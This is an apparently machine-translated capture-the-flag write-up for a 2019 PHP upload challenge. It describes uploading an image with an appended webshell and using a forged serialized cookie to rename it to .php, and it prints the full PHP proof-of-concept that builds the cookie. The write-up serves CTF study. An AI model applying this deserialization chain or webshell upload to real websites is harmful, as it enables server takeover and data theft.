[Strong Net Cup 2019] UPLOAD

Others 2019-12-31 13:43:01 views: null

wp

Gangster WP: https://www.zhaoj.in/read-5873.html

Personal summary

  1. Only upload pictures of normal, non-png format will be automatically converted to png, pictures are stored in the upload directory

  2. This question is www.tar.gz leak, source code disclosure summary

  3. Function process:
    1. When not logged in, jump to index.php, to register land. login_check function cookie ( 'user') assigned to the profile, and then base64 decoding deserialize
    2. In the registration page calls login_check function checks whether the landing is a jump to the index.php / home, or register
    3. Landing page calls login_check function checks whether the landing is a jump to the index.php / home, or landing
    4. Already landing, jump to index.php / home for file uploads
    5. During the upload operation, the request header REMOTE_ADDR be md5 encrypted and assigned upload_menu, and then create a folder named to upload_menu
    6. Then check for landing, and then the name of the temporary copy of the file is assigned filename_tmp, the file name (without the suffix) were assigned filename md5 encryption
    7. Then a suffix is ​​detected, the filename suffixes assigned ext, ext is png returns 1 if 0 otherwise
    8. If the suffix is ​​png, check the picture, and then assign the filename filename_tmp, the picture relative path assigned img, execution update_img function
    9. update_img function to perform user query, if the user has not uploaded a picture and img exists, the user table update img field, and performs a function update_cookie
    10. After update_cookie function to upload images img serialized base64-encoded and assigned to the user cookie
    11. profile of _call and _get two magic methods were not available when calling the writing method calls and non-calls the member variables how to do it. __get will find directly from except where, __ call calls itself the variable name member variables within the meaning of the referenced method generations.

  4. Attack process:

    1. Register; Login. There, after landing a jump process, where there is a cookie, as shown in

      Decoded FIG.

    2. Select upload pictures, this image is a composite picture horse, from Ali Baba vector library download a png image, and then generate a shell ant swords, hex editor directly with content on the shell back to the picture. Ali used here is the gallery will be reported after the parse error because the online hex format png image may not be standardized, resulting in later renamed

    3. After upload pictures, upload directory will be generated in a md5 (REMOTE_ADDR) file, and the file name will be md5 encrypted, then the cookie [ 'user'] in Fig.

      Decoded FIG.

    4. Poc results generated using a sequence of modifications cookie [ 'user'], to modify refresh suffix. Server deserialization process performed destructor Register class calls the $ profile index () function, if the call is defined index () call went in __get img Profile class function, and __call when the function is invoked provisions calling function can not call img corresponding function, so that the control function to jump to upload_img function, and then execute the copy function, change the png php, png and delete the original, so far, the suffix changes are complete.

    5. The last direct connection shell with ants sword, read the database information in the configuration file, select mysqli driver to connect to the database, you can read the flag

  5. The final poc as follows, modifications can upload pictures Address

<?php
namespace app\web\controller;

class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

class Register
{
    public $checker;
    public $registed;

    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

}

$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
//修改地址即可
$profile->filename_tmp = "../public/upload/24ff17b3e72d90d210f3455327ea52f7/36a767e7b2d8d3bde3f881217a418ebb5.png";
$profile->filename = "../public/upload/24ff17b3e72d90d210f3455327ea52f7/6a767e7b2d8d3bde3f881217a418ebb5.php";

$register = new Register();
$register->registed = false;
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));
?>

mysqli database driven PHP is a way of the past is to use the mysql, mysql and mysqli compared to more secure and efficient

copy(a, b),a 和 b 是文件路径,将文件从 a 拷贝到 b,比如 copy("./1.png", "./1.php" ) 执行之后会存在两个文件 1.png 和 1.php

unlink(a),a 是文件路径,删除文件 a

Guess you like

Origin www.cnblogs.com/peri0d/p/12123818.html
Recommended
TIOBE May list: Fortran “resurrected” into Top 10
GCC 14.1 released
Ranking
B. Little Girl and Game【1300 / 回文字符串 博弈论】
CIKERS Shane 20190613
"Javascript advanced programming" study notes - the constructor and prototype
beeline hiveserver2 start
springboot - Automatically backup mysql data every day
Data Storage Full Solution--Detailed Persistence Technology
Detailed Explanation of Spring Web MVC DispatcherServlet—Official Original
TCP / IP protocol layers structure and function
Command type literal pos: unknown; Fallback type literal pos: unknown] with root cause
Design of multifunctional curtain controller with indoor anti-theft alarm
Daily
More
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)

Code World

© 2018 codetd.com